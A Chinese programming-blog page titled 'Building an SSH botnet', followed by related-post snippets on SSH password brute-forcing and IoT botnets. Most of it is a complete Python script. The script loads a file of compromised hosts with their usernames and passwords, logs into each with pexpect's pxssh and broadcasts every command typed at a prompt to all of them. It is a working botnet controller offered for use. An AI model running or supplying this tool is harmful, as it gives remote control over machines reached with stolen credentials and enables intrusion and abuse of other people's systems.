2. 程式人生 > >構建SSH僵屍網路

構建SSH僵屍網路

阿新 發佈:2019-01-03 
#!/usr/bin/python  
#coding=utf-8  
import optparse  
from pexpect import pxssh  
import optparse  


#建立一個名為botnet 的全域性陣列,其中記錄了單個client 物件  
botNet=[]  
#定義一個用於存放host的列表以便判斷當前host之前是否已經新增進botNet中了  
hosts = []  


'''
#定義一個客戶端的類Client,生成Client()類物件的程式碼。為了構造client 物件,需要主機名、使用者名稱,以及密碼或金鑰。
同時,這個類還要包含維持與肉機連線所需的方法——connect()、send_command()  
'''
class Client(object):  
    """docstring for Client"""  
    def __init__(self, host, user, password):  
        self.host = host  
        self.user = user  
        self.password = password  
        self.session = self.connect()  
  
    def connect(self):  
        try:  
            s = pxssh.pxssh()  
            s.login(self.host,self.user,self.password)  
            return s  
        except Exception, e:  
            print e  
            print '[-] Error Connecting'  
  
    def send_command(self, cmd):  
        self.session.sendline(cmd)  
        self.session.prompt()  
        return self.session.before  


'''
botnetCommand()函式只要一個引數——要釋出的命令。這個函式遍歷整個陣列,把命令傳送到botnet 陣列中的每個client 上。
'''  
def botnetCommand(cmd, k):  
    for client in botNet:     
        output=client.send_command(cmd)  
        #若k為True即最後一臺主機發起請求後就輸出,否則輸出會和之前的重複  
        if k:  
            print '[*] Output from '+client.host  
            print '[+] '+output+'\n'  
  
'''
addClient()的方法,它的輸入是主機名、使用者和密碼,並以此例項化一個client 物件,並把它新增到botnet 數組裡
'''   
def addClient(host,user,password): 
    if len(hosts) == 0:  
        hosts.append(host)  
        client=Client(host,user,password)  
        botNet.append(client)  
    else:  
        t = True  
        #遍歷檢視host是否存在hosts列表中,若不存在則進行新增操作  
        for h in hosts:  
            if h == host:  
                t = False  
        if t:  
            hosts.append(host)  
            client=Client(host,user,password)  
            botNet.append(client)  
  
def main():  
    parser=optparse.OptionParser('Usage : ./botNet.py -f <botNet file>')  
    parser.add_option('-f',dest='file',type='string',help='specify botNet file')  
    (options,args)=parser.parse_args()  
    file = options.file  
    if file==None:  
        print parser.usage  
        exit(0)  
      
    #計算檔案行數,不能和下面的f用同一個open()否則會出錯  
    count = len(open(file,'r').readlines())  
  
    while True:  
        cmd=raw_input("<SSH> ")  
        k = 0  
        f = open(file,'r')  
        for line in f.readlines():  
            line = line.strip('\n')  
            host = line.split(':')[0]  
            user = line.split(':')[1]  
            password = line.split(':')[2]  
  
            k += 1  
  
            #這裡需要判斷是否到最後一臺主機呼叫函式,因為命令的輸出結果會把前面的所有結果都輸出從而會出現重複輸出的情況  
            if k < count:  
                addClient(host,user,password)  
                #不是最後一臺主機請求,則先不輸出命令結果  
                botnetCommand(cmd,False)  
            else:  
                addClient(host,user,password)  
                #最後一臺主機請求,則可以輸出命令結果  
                botnetCommand(cmd,True)  
      
if __name__ =='__main__':  
    main()  
 
將殭屍主機的資訊都儲存在一個檔案中、以:號將三類資訊分割開,從而指令碼可以方便地通過讀取檔案中的殭屍主機資訊,同時指令碼也實現了批量命令列互動的形式,和之前修改的ssh命令列互動的形式差不多,只是每次輸入一條命令所有的殭屍主機都會去執行從而返回命令結果:

使用者可以將收集到的ssh殭屍主機都儲存在botnet.txt檔案中,這樣指令碼執行起來執行就會十分地方便、實現批量式的操作。


相關推薦

構建SSH網路

#!/usr/bin/python #coding=utf-8 import optparse from pexpect import pxssh import optparse #建立一個名為botnet 的全域性陣列,其中記錄了單個client

2-用Python搭建一個SSH網路

Morris蠕蟲有三種攻擊方式,其中之一就是用常見的使用者名稱和密碼嘗試登入RSH(remote shell)服務。 RSH是1998年問世的,它為系統管理員提供了一種很棒(儘管不安全)遠端連線一臺機器,並能在主機上執行一系列終端命令對它進行管理的

Python指令碼暴力破解SSH口令以及構建網路(pxssh)

目錄 暴力破解SSH口令 SSH遠端執行命令 構建僵屍網路 環境:Kali Linux  python 2.7.13 暴力破解SSH口令 Pxssh是pexpect庫的ssh專用指令碼,他能用預先寫好的 login()、logout() 和 pro

新的網路病毒出現,感染“HDFS”發動DDoS功擊

我們都知道,DDOS功擊主要是通過大量的“肉雞”來進行發動的,要發動DDOS功擊首先需要大量的僵屍網路“肉雞”。根據相關媒體最新報道,一個全新的僵屍網路病毒正在以“HDFS”為目標,感染其成為“肉雞”,利用它們的計算能力發動分散式拒絕服務(DDoS)功擊。 什麼是“HDFS”呢?“HDFS”的全稱是

最新Chalubo網路來襲,目標指向伺服器和物聯網裝置

網路安全公司Sophos旗下SophosLabs在本週一(10月22日)發表的一篇博文中指出,他們近兩個月一直在持續關注一場開始於9月初的網路攻擊活動,目標是開啟了SSH伺服器的Linux伺服器。而在這場攻擊活動中,攻擊者的主要目的在於傳播一種被他們稱之為“Chalubo”的最新自動化DDos攻擊工

曲速未來 訊息|俄羅斯最新的MaaS網路:Black Rose Lucy

前言:   區塊鏈安全公司 曲速未來 表示:近年來我們看到網路犯罪分子越來越多地聘請網路僱傭兵和惡意軟體即服務(MaaS)提供商作為開展惡意活動的一種方式,從而更加註意這一建議。許多威脅演員更傾向於僱用具有更專業技能的較小團隊,而不是聚集擁有完全從頭開始攻擊所需的必要技能組的全能團

曲速未來 披露:新的網路隱藏在區塊鏈DNS霧中並刪除Cryptominer

DNS (域名系統)   DNS代表域名服務,它是網際網路的電話簿。將域名(如amazon.com)對映到IP地址(如123.456.789)的域名系統(DNS)。域名系統通過編號分配機構ICANN和註冊服務商進行偽分散治理。雖然不是盡善盡美,但我們必須要讚揚它,作為網際網路基礎設

學習筆記(十):使用支援向量機區分網路DGA家族

1.資料蒐集和資料清洗       ·1000個cryptolocker域名       ·1000個post-tovar-goz域名       ·alexa前1000域名   &n

HNS物聯網網路現在通過Wi-Fi使用ADB傳播到新的Android裝置

據Bitdefender實驗室報道,新的Hide and Seek變種能夠通過利用Android開發人員用於故障排除的Android除錯橋(ADB)功能在網路中招募新機器人。 雖然並非所有的Android裝置都預設啟用ADB,但是一些Android廠商決定讓它自動啟用,通過5555使用Wi-Fi ADB遠端

byob--建立自己的網路

BYOB是一個開源專案,為安全研究人員和開發人員提供構建和執行基本僵屍網路的框架,以加深他們對每年感染數百萬裝置併產生現代僵屍網路的複雜惡意軟體的理解,以提高他們的能力,制定應對這些威脅的對策。 它旨在允許開發人員輕鬆實現自己的程式碼並新增新功能,而無需從頭開始編寫RAT(遠端管理工具)或 C2(命令和控制

網路的治理

僵屍網路是一群被殭屍程式(bot)感染的殭屍主機(zombie)的集合,分佈於家庭、企業、政府機構等各種場合,接收來自殭屍控制者(botmaster)的指令,進行DDoS、資訊竊取、網路釣魚、垃圾郵件、廣告濫點、非法投票等多種攻擊行為。由於攻擊手段豐富多樣、隱蔽性強、有能力發動大規模攻擊、以

報道稱2018年78%惡意軟體網路事件的幕後黑手是物聯網網路

根據諾基亞威脅情報實驗室(Nokia Threat Intelligence Lab)的一份報告,部署在1.5億多臺裝置上的NetGuard安全解決方案檢測到的網路惡意網路事件中,約78%是由物聯網(IoT)僵屍網路活動造成的。 諾基亞2019年度威脅情報報告還報道使用了來自世界各地的傳統寬頻和行動網路上的

一個由20000多個WordPress站點組成的網路正攻擊並感染其他WordPress站點

WordPress WordPress是使用PHP語言開發的部落格平臺,使用者可以在支援PHP和MySQL資料庫的伺服器上架設屬於自己的網站。也可以把 WordPress當作一個內容管理系統(CMS)來使用。 WordPress是一款個人部落格系統,並逐步演化成一款內容管理系統軟體,它是使用

網路***智慧物聯網裝置的趨勢分析

隨著網際網路的不斷髮展,智慧物聯網裝置越來越多,截止到現在已達到億級的數量,等到明年5G網路正式商用,物聯網裝置的數量可能還會翻倍增長。由於物聯網裝置的安全性仍處於起步階段,很多裝置生產廠商也不夠重視,導致僵屍網路製造者的目標開始從傳統的PC電腦轉向了各式各樣的物聯網裝置。今天墨者安全就來分析一下2019

基於Linux平臺下的網路病毒《比爾蓋茨》

感覺分析的很好,所以決定翻譯出來,希望和大家多多交流O(∩_∩)O~ 轉載請註明出處:http://blog.csdn.net/u010484477     O(∩_∩)O謝謝 關鍵字:病毒,linux,資訊保安 我昨天寫的日誌裡面提到,家用路由器在x86的

曲速未來 警惕:Mirai,Gafgyt IoT網路正在覆蓋企業部門

區塊鏈安全諮詢公司 曲速未來 訊息:Mirai和Gafgyt是兩個最著名的物聯網僵屍網路,它們再次分叉,新的變種在企業部門偷看,用於建立或補充他們的分散式攻擊的拒絕服務資源。 Mirai活動正在增加:運營Mirai追蹤器的美國安全研究員Troy Mursch

懸鏡安全丨德國電信斷網事件詳細分析:mirai網路的新變種和舊主控

昨天小編說到德國電信斷網事件,導致2千萬固定網路使用者中的90萬路由器發生障礙,今天我們就來分析一下導致此次事件的原因以及可能出現的問題和已經存在的問題等。 備註:本文是360安全研究員 Li Fengpei原創,轉載來自freebuf。如需轉載,請標註原創作者以及轉載

網路簡介

僵屍網路的發展歷程概括為5個階段,分析各階段特點和代表性僵屍網路,對僵屍網路進行形式化定義並依據命令控制通道拓撲結構將其劃分為4類。 當前僵屍網路研究熱點歸納為:檢測、追蹤、測量、預測和對抗5個環節。 僵屍網路之所以形成如此嚴重的威脅,從技術角度來開,主要有一下原因:

p2p網路工作原理

 嚴格的說,本節所要討論的內容已經超出了本文主題範圍,但是因為P2P驅動的DDoS攻擊很容易與基於P2P的僵屍網路發起的DDoS攻擊混淆,所以在這裡簡要討論一下。前者是利用P2P協議本身的漏洞,作為發起攻擊的手段,而後者在本質上同其它僵屍網路的DDoS攻擊一樣,只是僵屍網路的

支援向量機區分網路DGA

僵屍網路一般為了躲避域名黑名單,會使用DGA動態生成域名,通過DGA不同的特徵,可以識別不同的特徵。DGA檔案格式如下:首先從DGA檔案中提取域名資料def load_alexa(filename): domain_list = [] csv_reader =